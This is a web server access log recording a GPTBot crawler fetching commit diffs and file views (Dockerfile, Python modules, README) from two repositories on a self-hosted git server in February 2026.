"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 196578] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 229673] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 11108] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 74.7.227.38] [Length 16010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 7504] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 174799] [Gzip 16.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17136] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 265994] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17359] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17143] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 18043] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 229667] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 265994] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" -[17/Feb/2026:13:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10011] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12448] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16153] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10666] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11354] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11521] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10500] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12203] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13326] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15936] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 15725] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" -[17/Feb/2026:13:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14915] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" -[17/Feb/2026:13:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11873] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10483] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:13:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12326] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:13:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13077] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" -[17/Feb/2026:13:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" -[17/Feb/2026:13:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" -[17/Feb/2026:13:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16390] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" -[17/Feb/2026:13:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" -[17/Feb/2026:13:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11538] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:13:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11748] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11666] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:13:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12858] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:13:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" -[17/Feb/2026:13:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:13:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15823] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" -[17/Feb/2026:13:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" -[17/Feb/2026:13:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23747] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:33:26 +0000] - 200 200 - 